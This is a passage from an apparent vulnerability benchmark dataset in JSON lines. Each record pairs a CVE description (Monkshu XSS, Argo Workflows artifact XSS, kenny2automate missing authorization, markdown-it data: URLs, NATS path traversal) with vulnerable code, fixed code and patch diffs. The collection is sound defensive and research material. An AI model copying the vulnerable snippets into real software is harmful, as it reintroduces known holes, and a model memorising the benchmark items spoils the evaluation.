\"%20\").replace(\"\\r\", \"%0D\").replace(\"\\n\", \"%0A\")\n \n (scheme, authority, request_uri, defrag_uri) = urlnorm(uri)\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-32812", "cve_description": "Monkshu is an enterprise application server for mobile apps (iOS and Android), responsive HTML 5 apps, and JSON API services. In version 2.90 and earlier, there is a reflected cross-site scripting vulnerability in frontend HTTP server. The attacker can send in a carefully crafted URL along with a known bug in the server which will cause a 500 error, and the response will then embed the URL provided by the hacker. The impact is moderate as the hacker must also be able to craft an HTTP request which should cause a 500 server error. None such requests are known as this point. The issue is patched in version 2.95. As a workaround, one may use a disk caching plugin.", "cwe_info": {"CWE-116": {"name": "Improper Encoding or Escaping of Output", "description": "The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved."}}, "repo": "https://github.com/TekMonksGitHub/monkshu", "patch_url": ["https://github.com/TekMonksGitHub/monkshu/commit/4601a9bfdc934d7ac32619ce621652fad0cf452b"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_284_1", "commit": "c83fde7f212aa049f8f3028f15d9ed4083e77dee", "file_path": "frontend/server/server.js", "start_line": 122, "end_line": 144, "snippet": "function _sendFile(fileRequested, req, res, stats) {\n\tfs.open(fileRequested, \"r\", (err, fd) => {\t\n\t\tif (err) (err.code === \"ENOENT\") ? _sendError(req, res, 404, \"Path Not Found.\") : _sendError(req, res, 500, err);\n\t\telse {\n\t\t\taccess.info(`Sending: ${fileRequested}`);\n\t\t\tconst mime = conf.mimeTypes[path.extname(fileRequested)];\n\t\t\tconst rawStream = fs.createReadStream(null, {\"flags\":\"r\",\"fd\":fd,\"autoClose\":true});\n\t\t\tconst acceptEncodingHeader = req.headers[\"accept-encoding\"] || \"\";\n\n\t\t\tif (conf.enableGZIPEncoding && acceptEncodingHeader.includes(\"gzip\") && mime && (!Array.isArray(mime) || Array.isArray(mime) && mime[1]) ) {\n\t\t\t\tres.writeHead(200, _getServerHeaders({ \"Content-Type\": Array.isArray(mime)?mime[0]:mime, \"Content-Encoding\": \"gzip\" }, stats));\n\t\t\t\trawStream.pipe(zlib.createGzip()).pipe(res)\n\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: ${req.url}, Server error: ${err}`))\n\t\t\t\t.on(\"end\", _ => res.end());\n\t\t\t} else {\n\t\t\t\tres.writeHead(200, mime ? _getServerHeaders({\"Content-Type\":Array.isArray(mime)?mime[0]:mime}, stats) : _getServerHeaders({}, stats));\n\t\t\t\trawStream.on(\"data\", chunk => res.write(chunk, \"binary\"))\n\t\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: ${req.url}, Server error: ${err}`))\n\t\t\t\t\t.on(\"end\", _ => res.end());\n\t\t\t}\n\t\t}\n\t});\n}"}], "fix_func": [{"id": "fix_js_284_1", "commit": "4601a9bfdc934d7ac32619ce621652fad0cf452b", "file_path": "frontend/server/server.js", "start_line": 122, "end_line": 144, "snippet": "function _sendFile(fileRequested, req, res, stats) {\n\tfs.open(fileRequested, \"r\", (err, fd) => {\t\n\t\tif (err) (err.code === \"ENOENT\") ? _sendError(req, res, 404, \"Path Not Found.\") : _sendError(req, res, 500, err);\n\t\telse {\n\t\t\taccess.info(`Sending: ${fileRequested}`);\n\t\t\tconst mime = conf.mimeTypes[path.extname(fileRequested)];\n\t\t\tconst rawStream = fs.createReadStream(null, {\"flags\":\"r\",\"fd\":fd,\"autoClose\":true});\n\t\t\tconst acceptEncodingHeader = req.headers[\"accept-encoding\"] || \"\";\n\n\t\t\tif (conf.enableGZIPEncoding && acceptEncodingHeader.includes(\"gzip\") && mime && (!Array.isArray(mime) || Array.isArray(mime) && mime[1]) ) {\n\t\t\t\tres.writeHead(200, _getServerHeaders({ \"Content-Type\": Array.isArray(mime)?mime[0]:mime, \"Content-Encoding\": \"gzip\" }, stats));\n\t\t\t\trawStream.pipe(zlib.createGzip()).pipe(res)\n\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: Error: ${err}`))\n\t\t\t\t.on(\"end\", _ => res.end());\n\t\t\t} else {\n\t\t\t\tres.writeHead(200, mime ? _getServerHeaders({\"Content-Type\":Array.isArray(mime)?mime[0]:mime}, stats) : _getServerHeaders({}, stats));\n\t\t\t\trawStream.on(\"data\", chunk => res.write(chunk, \"binary\"))\n\t\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: Error: ${err}`))\n\t\t\t\t\t.on(\"end\", _ => res.end());\n\t\t\t}\n\t\t}\n\t});\n}"}], "vul_patch": "--- a/frontend/server/server.js\n+++ b/frontend/server/server.js\n@@ -10,12 +10,12 @@\n \t\t\tif (conf.enableGZIPEncoding && acceptEncodingHeader.includes(\"gzip\") && mime && (!Array.isArray(mime) || Array.isArray(mime) && mime[1]) ) {\n \t\t\t\tres.writeHead(200, _getServerHeaders({ \"Content-Type\": Array.isArray(mime)?mime[0]:mime, \"Content-Encoding\": \"gzip\" }, stats));\n \t\t\t\trawStream.pipe(zlib.createGzip()).pipe(res)\n-\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: ${req.url}, Server error: ${err}`))\n+\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: Error: ${err}`))\n \t\t\t\t.on(\"end\", _ => res.end());\n \t\t\t} else {\n \t\t\t\tres.writeHead(200, mime ? _getServerHeaders({\"Content-Type\":Array.isArray(mime)?mime[0]:mime}, stats) : _getServerHeaders({}, stats));\n \t\t\t\trawStream.on(\"data\", chunk => res.write(chunk, \"binary\"))\n-\t\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: ${req.url}, Server error: ${err}`))\n+\t\t\t\t\t.on(\"error\", err => _sendError(req, res, 500, `500: Error: ${err}`))\n \t\t\t\t\t.on(\"end\", _ => res.end());\n \t\t\t}\n \t\t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-29164", "cve_description": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. In affected versions an attacker can create a workflow which produces a HTML artifact containing an HTML file that contains a script which uses XHR calls to interact with the Argo Server API. The attacker emails the deep-link to the artifact to their victim. The victim opens the link, the script starts running. As the script has access to the Argo Server API (as the victim), so may read information about the victim\u2019s workflows, or create and delete workflows. Note the attacker must be an insider: they must have access to the same cluster as the victim and must already be able to run their own workflows. The attacker must have an understanding of the victim\u2019s system. We have seen no evidence of this in the wild. We urge all users to upgrade to the fixed versions.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/argoproj/argo-workflows", "patch_url": ["https://github.com/argoproj/argo-workflows/commit/87470e1c2bf703a9110e97bb755614ce8757fdcc"], "programing_language": "Go", "vul_func": [{"id": "vul_go_267_1", "commit": "61b80c90fd93aebff26df73fcddffa75732d10ec", "file_path": "server/apiserver/argoserver.go", "start_line": 297, "end_line": 367, "snippet": "func (as *argoServer) newHTTPServer(ctx context.Context, port int, artifactServer *artifacts.ArtifactServer) *http.Server {\n\tendpoint := fmt.Sprintf(\"localhost:%d\", port)\n\n\tmux := http.NewServeMux()\n\thttpServer := http.Server{\n\t\tAddr: endpoint,\n\t\tHandler: accesslog.Interceptor(mux),\n\t\tTLSConfig: as.tlsConfig,\n\t}\n\tdialOpts := []grpc.DialOption{\n\t\tgrpc.WithDefaultCallOptions(grpc.MaxCallRecvMsgSize(MaxGRPCMessageSize)),\n\t}\n\tif as.tlsConfig != nil {\n\t\tdialOpts = append(dialOpts, grpc.WithTransportCredentials(credentials.NewTLS(as.tlsConfig)))\n\t} else {\n\t\tdialOpts = append(dialOpts, grpc.WithTransportCredentials(insecure.NewCredentials()))\n\t}\n\n\twebhookInterceptor := webhook.Interceptor(as.clients.Kubernetes)\n\n\t// HTTP 1.1+JSON Server\n\t// grpc-ecosystem/grpc-gateway is used to proxy HTTP requests to the corresponding gRPC call\n\t// NOTE: if a marshaller option is not supplied, grpc-gateway will default to the jsonpb from\n\t// golang/protobuf. Which does not support types such as time.Time. gogo/protobuf does support\n\t// time.Time, but does not support custom UnmarshalJSON() and MarshalJSON() methods. Therefore\n\t// we use our own Marshaler\n\tgwMuxOpts := runtime.WithMarshalerOption(runtime.MIMEWildcard, new(json.JSONMarshaler))\n\tgwmux := runtime.NewServeMux(gwMuxOpts,\n\t\truntime.WithIncomingHeaderMatcher(func(key string) (string, bool) { return key, true }),\n\t\truntime.WithProtoErrorHandler(runtime.DefaultHTTPProtoErrorHandler),\n\t)\n\tmustRegisterGWHandler(infopkg.RegisterInfoServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(eventpkg.RegisterEventServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(eventsourcepkg.RegisterEventSourceServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(sensorpkg.RegisterSensorServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(pipelinepkg.RegisterPipelineServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(workflowpkg.RegisterWorkflowServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(workflowtemplatepkg.RegisterWorkflowTemplateServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(cronworkflowpkg.RegisterCronWorkflowServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(workflowarchivepkg.RegisterArchivedWorkflowServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(clusterwftemplatepkg.RegisterClusterWorkflowTemplateServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\n\tmux.HandleFunc(\"/api/\", func(w http.ResponseWriter, r *http.Request) {\n\t\t// we must delete this header for API request to prevent \"stream terminated by RST_STREAM with error code: PROTOCOL_ERROR\" error\n\t\tr.Header.Del(\"Connection\")\n\t\twebhookInterceptor(w, r, gwmux)\n\t})\n\tmux.HandleFunc(\"/artifacts/\", artifactServer.GetOutputArtifact)\n\tmux.HandleFunc(\"/input-artifacts/\", artifactServer.GetInputArtifact)\n\tmux.HandleFunc(\"/artifacts-by-uid/\", artifactServer.GetOutputArtifactByUID)\n\tmux.HandleFunc(\"/input-artifacts-by-uid/\", artifactServer.GetInputArtifactByUID)\n\tmux.HandleFunc(\"/artifact-files/\", artifactServer.GetArtifactFile)\n\tmux.Handle(\"/oauth2/redirect\", handlers.ProxyHeaders(http.HandlerFunc(as.oAuth2Service.HandleRedirect)))\n\tmux.Handle(\"/oauth2/callback\", handlers.ProxyHeaders(http.HandlerFunc(as.oAuth2Service.HandleCallback)))\n\tmux.HandleFunc(\"/metrics\", func(w http.ResponseWriter, r *http.Request) {\n\t\tif os.Getenv(\"ARGO_SERVER_METRICS_AUTH\") != \"false\" {\n\t\t\theader := metadata.New(map[string]string{\"authorization\": r.Header.Get(\"Authorization\")})\n\t\t\tctx := metadata.NewIncomingContext(context.Background(), header)\n\t\t\tif _, err := as.gatekeeper.Context(ctx); err != nil {\n\t\t\t\tlog.WithError(err).Error(\"failed to authenticate /metrics endpoint\")\n\t\t\t\tw.WriteHeader(403)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\tpromhttp.Handler().ServeHTTP(w, r)\n\n\t})\n\t// we only enable HTST if we are secure mode, otherwise you would never be able access the UI\n\tmux.HandleFunc(\"/\", static.NewFilesServer(as.baseHRef, as.tlsConfig != nil && as.hsts, as.xframeOptions, as.accessControlAllowOrigin).ServerFiles)\n\treturn &httpServer\n}"}], "fix_func": [{"id": "fix_go_267_1", "commit": "87470e1c2bf703a9110e97bb755614ce8757fdcc", "file_path": "server/apiserver/argoserver.go", "start_line": 297, "end_line": 371, "snippet": "func (as *argoServer) newHTTPServer(ctx context.Context, port int, artifactServer *artifacts.ArtifactServer) *http.Server {\n\tendpoint := fmt.Sprintf(\"localhost:%d\", port)\n\n\tmux := http.NewServeMux()\n\thttpServer := http.Server{\n\t\tAddr: endpoint,\n\t\tHandler: accesslog.Interceptor(mux),\n\t\tTLSConfig: as.tlsConfig,\n\t}\n\tdialOpts := []grpc.DialOption{\n\t\tgrpc.WithDefaultCallOptions(grpc.MaxCallRecvMsgSize(MaxGRPCMessageSize)),\n\t}\n\tif as.tlsConfig != nil {\n\t\tdialOpts = append(dialOpts, grpc.WithTransportCredentials(credentials.NewTLS(as.tlsConfig)))\n\t} else {\n\t\tdialOpts = append(dialOpts, grpc.WithTransportCredentials(insecure.NewCredentials()))\n\t}\n\n\twebhookInterceptor := webhook.Interceptor(as.clients.Kubernetes)\n\n\t// HTTP 1.1+JSON Server\n\t// grpc-ecosystem/grpc-gateway is used to proxy HTTP requests to the corresponding gRPC call\n\t// NOTE: if a marshaller option is not supplied, grpc-gateway will default to the jsonpb from\n\t// golang/protobuf. Which does not support types such as time.Time. gogo/protobuf does support\n\t// time.Time, but does not support custom UnmarshalJSON() and MarshalJSON() methods. Therefore\n\t// we use our own Marshaler\n\tgwMuxOpts := runtime.WithMarshalerOption(runtime.MIMEWildcard, new(json.JSONMarshaler))\n\tgwmux := runtime.NewServeMux(gwMuxOpts,\n\t\truntime.WithIncomingHeaderMatcher(func(key string) (string, bool) { return key, true }),\n\t\truntime.WithProtoErrorHandler(runtime.DefaultHTTPProtoErrorHandler),\n\t)\n\tmustRegisterGWHandler(infopkg.RegisterInfoServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(eventpkg.RegisterEventServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(eventsourcepkg.RegisterEventSourceServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(sensorpkg.RegisterSensorServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(pipelinepkg.RegisterPipelineServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(workflowpkg.RegisterWorkflowServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(workflowtemplatepkg.RegisterWorkflowTemplateServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(cronworkflowpkg.RegisterCronWorkflowServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(workflowarchivepkg.RegisterArchivedWorkflowServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\tmustRegisterGWHandler(clusterwftemplatepkg.RegisterClusterWorkflowTemplateServiceHandlerFromEndpoint, ctx, gwmux, endpoint, dialOpts)\n\n\tmux.HandleFunc(\"/api/\", func(w http.ResponseWriter, r *http.Request) {\n\t\t// we must delete this header for API request to prevent \"stream terminated by RST_STREAM with error code: PROTOCOL_ERROR\" error\n\t\tr.Header.Del(\"Connection\")\n\t\twebhookInterceptor(w, r, gwmux)\n\t})\n\n\t// emergency environment variable that allows you to disable the artifact service in case of problems\n\tif os.Getenv(\"ARGO_ARTIFACT_SERVER\") != \"false\" {\n\t\tmux.HandleFunc(\"/artifacts/\", artifactServer.GetOutputArtifact)\n\t\tmux.HandleFunc(\"/input-artifacts/\", artifactServer.GetInputArtifact)\n\t\tmux.HandleFunc(\"/artifacts-by-uid/\", artifactServer.GetOutputArtifactByUID)\n\t\tmux.HandleFunc(\"/input-artifacts-by-uid/\", artifactServer.GetInputArtifactByUID)\n\t\tmux.HandleFunc(\"/artifact-files/\", artifactServer.GetArtifactFile)\n\t}\n\tmux.Handle(\"/oauth2/redirect\", handlers.ProxyHeaders(http.HandlerFunc(as.oAuth2Service.HandleRedirect)))\n\tmux.Handle(\"/oauth2/callback\", handlers.ProxyHeaders(http.HandlerFunc(as.oAuth2Service.HandleCallback)))\n\tmux.HandleFunc(\"/metrics\", func(w http.ResponseWriter, r *http.Request) {\n\t\tif os.Getenv(\"ARGO_SERVER_METRICS_AUTH\") != \"false\" {\n\t\t\theader := metadata.New(map[string]string{\"authorization\": r.Header.Get(\"Authorization\")})\n\t\t\tctx := metadata.NewIncomingContext(context.Background(), header)\n\t\t\tif _, err := as.gatekeeper.Context(ctx); err != nil {\n\t\t\t\tlog.WithError(err).Error(\"failed to authenticate /metrics endpoint\")\n\t\t\t\tw.WriteHeader(403)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\tpromhttp.Handler().ServeHTTP(w, r)\n\n\t})\n\t// we only enable HTST if we are secure mode, otherwise you would never be able access the UI\n\tmux.HandleFunc(\"/\", static.NewFilesServer(as.baseHRef, as.tlsConfig != nil && as.hsts, as.xframeOptions, as.accessControlAllowOrigin).ServerFiles)\n\treturn &httpServer\n}"}], "vul_patch": "--- a/server/apiserver/argoserver.go\n+++ b/server/apiserver/argoserver.go\n@@ -45,11 +45,15 @@\n \t\tr.Header.Del(\"Connection\")\n \t\twebhookInterceptor(w, r, gwmux)\n \t})\n-\tmux.HandleFunc(\"/artifacts/\", artifactServer.GetOutputArtifact)\n-\tmux.HandleFunc(\"/input-artifacts/\", artifactServer.GetInputArtifact)\n-\tmux.HandleFunc(\"/artifacts-by-uid/\", artifactServer.GetOutputArtifactByUID)\n-\tmux.HandleFunc(\"/input-artifacts-by-uid/\", artifactServer.GetInputArtifactByUID)\n-\tmux.HandleFunc(\"/artifact-files/\", artifactServer.GetArtifactFile)\n+\n+\t// emergency environment variable that allows you to disable the artifact service in case of problems\n+\tif os.Getenv(\"ARGO_ARTIFACT_SERVER\") != \"false\" {\n+\t\tmux.HandleFunc(\"/artifacts/\", artifactServer.GetOutputArtifact)\n+\t\tmux.HandleFunc(\"/input-artifacts/\", artifactServer.GetInputArtifact)\n+\t\tmux.HandleFunc(\"/artifacts-by-uid/\", artifactServer.GetOutputArtifactByUID)\n+\t\tmux.HandleFunc(\"/input-artifacts-by-uid/\", artifactServer.GetInputArtifactByUID)\n+\t\tmux.HandleFunc(\"/artifact-files/\", artifactServer.GetArtifactFile)\n+\t}\n \tmux.Handle(\"/oauth2/redirect\", handlers.ProxyHeaders(http.HandlerFunc(as.oAuth2Service.HandleRedirect)))\n \tmux.Handle(\"/oauth2/callback\", handlers.ProxyHeaders(http.HandlerFunc(as.oAuth2Service.HandleCallback)))\n \tmux.HandleFunc(\"/metrics\", func(w http.ResponseWriter, r *http.Request) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-22452", "cve_description": "kenny2automate is a Discord bot. In the web interface for server settings, form elements were generated with Discord channel IDs as part of input names. Prior to commit a947d7c, no validation was performed to ensure that the channel IDs submitted actually belonged to the server being configured. Thus anyone who has access to the channel ID they wish to change settings for and the server settings panel for any server could change settings for the requested channel no matter which server it belonged to. Commit a947d7c resolves the issue and has been deployed to the official instance of the bot. The only workaround that exists is to disable the web config entirely by changing it to run on localhost. Note that a workaround is only necessary for those who run their own instance of the bot.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/Kenny2github/kenny2automate", "patch_url": ["https://github.com/Kenny2github/kenny2automate/commit/a947d7ce408687b587c7e6dfd6026f7c4ee31ac2"], "programing_language": "Python", "vul_func": [{"id": "vul_py_249_1", "commit": "a5e1ac9", "file_path": "kenny2automate/server/__init__.py", "start_line": 551, "end_line": 593, "snippet": " async def save_server(self, request):\n await self.elg(request)\n guild = self.bot.get_guild(int(request.match_info.get('server', '0')))\n if guild is None:\n self.notfound()\n if not guild.get_member(\n int(self.getsesh(request)['client']['id'])\n ).guild_permissions.administrator:\n self.notfound()\n data = await request.post()\n params = []\n otherparams = {}\n for k in data.keys():\n if not k.startswith('channel-'):\n otherparams[k] = ','.join(data.getall(k))\n continue\n param = {'channel_id': int(k[len('channel-'):])}\n for v in data.getall(k):\n v = v.partition('=')\n if v[0] == 'ping':\n if 'ping' not in param:\n param['ping'] = set()\n param['ping'].add(v[-1])\n else:\n param[v[0]] = v[-1] or None\n param['ping'] = '|'.join(param.get('ping', ())) or None\n params.append(param)\n otherparams['guild_id'] = guild.id\n try:\n with self.db.connection:\n self.db.executemany(\n 'UPDATE channels SET lang=:lang, games_ping=:ping \\\nWHERE channel_id=:channel_id',\n params\n )\n self.db.execute(\n 'UPDATE guilds SET guild_disabled_commands=:disable_cmd, \\\nguild_disabled_cogs=:disable_cog, words_censor=:words_censor WHERE guild_id=:guild_id',\n otherparams\n )\n except sql.ProgrammingError as exc:\n raise web.HTTPBadRequest(reason=str(exc))\n raise web.HTTPSeeOther(request.path)"}], "fix_func": [{"id": "fix_py_249_1", "commit": "a947d7c", "file_path": "kenny2automate/server/__init__.py", "start_line": 551, "end_line": 596, "snippet": " async def save_server(self, request):\n await self.elg(request)\n guild = self.bot.get_guild(int(request.match_info.get('server', '0')))\n if guild is None:\n self.notfound()\n if not guild.get_member(\n int(self.getsesh(request)['client']['id'])\n ).guild_permissions.administrator:\n self.notfound()\n data = await request.post()\n params = []\n otherparams = {}\n for k in data.keys():\n if not k.startswith('channel-'):\n otherparams[k] = ','.join(data.getall(k))\n continue\n param = {'channel_id': int(k[len('channel-'):])}\n for v in data.getall(k):\n v = v.partition('=')\n if v[0] == 'ping':\n if 'ping' not in param:\n param['ping'] = set()\n param['ping'].add(v[-1])\n else:\n param[v[0]] = v[-1] or None\n param['ping'] = '|'.join(param.get('ping', ())) or None\n params.append(param)\n otherparams['guild_id'] = guild.id\n if set(param['channel_id'] for param in params) \\\n - set(channel.id for channel in guild.channels): # is not empty\n raise web.HTTPBadRequest\n try:\n with self.db.connection:\n self.db.executemany(\n 'UPDATE channels SET lang=:lang, games_ping=:ping \\\nWHERE channel_id=:channel_id',\n params\n )\n self.db.execute(\n 'UPDATE guilds SET guild_disabled_commands=:disable_cmd, \\\nguild_disabled_cogs=:disable_cog, words_censor=:words_censor WHERE guild_id=:guild_id',\n otherparams\n )\n except sql.ProgrammingError as exc:\n raise web.HTTPBadRequest(reason=str(exc))\n raise web.HTTPSeeOther(request.path)"}], "vul_patch": "--- a/kenny2automate/server/__init__.py\n+++ b/kenny2automate/server/__init__.py\n@@ -26,6 +26,9 @@\n param['ping'] = '|'.join(param.get('ping', ())) or None\n params.append(param)\n otherparams['guild_id'] = guild.id\n+ if set(param['channel_id'] for param in params) \\\n+ - set(channel.id for channel in guild.channels): # is not empty\n+ raise web.HTTPBadRequest\n try:\n with self.db.connection:\n self.db.executemany(\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2015-3295", "cve_description": "markdown-it before 4.1.0 does not block data: URLs.", "cwe_info": {"CWE-284": {"name": "Improper Access Control", "description": "The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor."}}, "repo": "https://github.com/markdown-it/markdown-it", "patch_url": ["https://github.com/markdown-it/markdown-it/commit/f76d3beb46abd121892a2e2e5c78376354c214e3"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_61_1", "commit": "f7976b2", "file_path": "lib/index.js", "start_line": 24, "end_line": 35, "snippet": "var BAD_PROTOCOLS = [ 'vbscript', 'javascript', 'file' ];\n\nfunction validateLink(url) {\n // url should be normalized at this point, and existing entities are decoded\n //\n var str = url.trim().toLowerCase();\n\n if (str.indexOf(':') >= 0 && BAD_PROTOCOLS.indexOf(str.split(':')[0]) >= 0) {\n return false;\n }\n return true;\n}"}], "fix_func": [{"id": "fix_js_61_1", "commit": "f76d3be", "file_path": "lib/index.js", "start_line": 23, "end_line": 53, "snippet": "////////////////////////////////////////////////////////////////////////////////\n//\n// This validator does not pretent to functionality of full weight sanitizers.\n// It's a tradeoff between default security, simplicity and usability.\n// If you need different setup - override validator method as you wish. Or\n// replace it with dummy function and use external sanitizer.\n//\n\nvar BAD_PROTOCOLS = [ 'vbscript', 'javascript', 'file', 'data' ];\nvar ALLOWED_DATA_MIMES = [\n 'data:image/gif',\n 'data:image/png',\n 'data:image/jpeg',\n 'data:image/webp'\n];\n\nfunction validateLink(url) {\n // url should be normalized at this point, and existing entities are decoded\n\n var str = url.trim().toLowerCase(),\n protocol = str.split(':')[0];\n\n if (str.indexOf(':') >= 0 && BAD_PROTOCOLS.indexOf(protocol) >= 0) {\n if (protocol === 'data' && ALLOWED_DATA_MIMES.indexOf(str.split(';')[0]) >= 0) {\n return true;\n }\n return false;\n }\n\n return true;\n}"}], "vul_patch": "--- a/lib/index.js\n+++ b/lib/index.js\n@@ -1,12 +1,31 @@\n-var BAD_PROTOCOLS = [ 'vbscript', 'javascript', 'file' ];\n+////////////////////////////////////////////////////////////////////////////////\n+//\n+// This validator does not pretent to functionality of full weight sanitizers.\n+// It's a tradeoff between default security, simplicity and usability.\n+// If you need different setup - override validator method as you wish. Or\n+// replace it with dummy function and use external sanitizer.\n+//\n+\n+var BAD_PROTOCOLS = [ 'vbscript', 'javascript', 'file', 'data' ];\n+var ALLOWED_DATA_MIMES = [\n+ 'data:image/gif',\n+ 'data:image/png',\n+ 'data:image/jpeg',\n+ 'data:image/webp'\n+];\n \n function validateLink(url) {\n // url should be normalized at this point, and existing entities are decoded\n- //\n- var str = url.trim().toLowerCase();\n \n- if (str.indexOf(':') >= 0 && BAD_PROTOCOLS.indexOf(str.split(':')[0]) >= 0) {\n+ var str = url.trim().toLowerCase(),\n+ protocol = str.split(':')[0];\n+\n+ if (str.indexOf(':') >= 0 && BAD_PROTOCOLS.indexOf(protocol) >= 0) {\n+ if (protocol === 'data' && ALLOWED_DATA_MIMES.indexOf(str.split(';')[0]) >= 0) {\n+ return true;\n+ }\n return false;\n }\n+\n return true;\n }\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2015-3295:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/markdown-it\ngit apply --whitespace=nowarn /workspace/fix.patch /workspace/test.patch \nnpx mocha test/markdown-it.js\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2015-3295:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/markdown-it\ngit apply --whitespace=nowarn /workspace/fix.patch\n\nnpx mocha test/misc.js test/ruler.js test/utils.js test/token.js test/commonmark.js\n"} {"cve_id": "CVE-2022-28357", "cve_description": "NATS nats-server 2.2.0 through 2.7.4 allows directory traversal because of an unintended path to a management action from a management account.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/nats-io/nats-server", "patch_url": ["https://github.com/nats-io/nats-server/commit/64feb142a92fb9bd98f117df8b5cd7fd71ee0c76"], "programing_language": "Go", "vul_func": [{"id": "vul_go_150_1", "commit": "92f4dc9", "file_path": "server/dirstore.go", "start_line": 313, "end_line": 329, "snippet": "func (store *DirJWTStore) Merge(pack string) error {\n\tnewJWTs := strings.Split(pack, \"\\n\")\n\tfor _, line := range newJWTs {\n\t\tif line == _EMPTY_ { // ignore blank lines\n\t\t\tcontinue\n\t\t}\n\t\tsplit := strings.Split(line, \"|\")\n\t\tif len(split) != 2 {\n\t\t\treturn fmt.Errorf(\"line in package didn't contain 2 entries: %q\", line)\n\t\t}\n\t\tpubKey := split[0]\n\t\tif err := store.saveIfNewer(pubKey, split[1]); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}"}, {"id": "vul_go_150_2", "commit": "92f4dc9", "file_path": "server/dirstore.go", "start_line": 369, "end_line": 380, "snippet": "func (store *DirJWTStore) pathForKey(publicKey string) string {\n\tif len(publicKey) < 2 {\n\t\treturn _EMPTY_\n\t}\n\tfileName := fmt.Sprintf(\"%s%s\", publicKey, fileExtension)\n\tif store.shard {\n\t\tlast := publicKey[len(publicKey)-2:]\n\t\treturn filepath.Join(store.directory, last, fileName)\n\t} else {\n\t\treturn filepath.Join(store.directory, fileName)\n\t}\n}"}, {"id": "vul_go_150_3", "commit": "92f4dc9", "file_path": "server/dirstore.go", "start_line": 492, "end_line": 529, "snippet": "func (store *DirJWTStore) saveIfNewer(publicKey string, theJWT string) error {\n\tif store.readonly {\n\t\treturn fmt.Errorf(\"store is read-only\")\n\t}\n\tpath := store.pathForKey(publicKey)\n\tif path == _EMPTY_ {\n\t\treturn fmt.Errorf(\"invalid public key\")\n\t}\n\tdirPath := filepath.Dir(path)\n\tif _, err := validateDirPath(dirPath); err != nil {\n\t\tif err := os.MkdirAll(dirPath, defaultDirPerms); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\tif _, err := os.Stat(path); err == nil {\n\t\tif newJWT, err := jwt.DecodeGeneric(theJWT); err != nil {\n\t\t\t// skip if it can't be decoded\n\t\t} else if existing, err := ioutil.ReadFile(path); err != nil {\n\t\t\treturn err\n\t\t} else if existingJWT, err := jwt.DecodeGeneric(string(existing)); err != nil {\n\t\t\t// skip if it can't be decoded\n\t\t} else if existingJWT.ID == 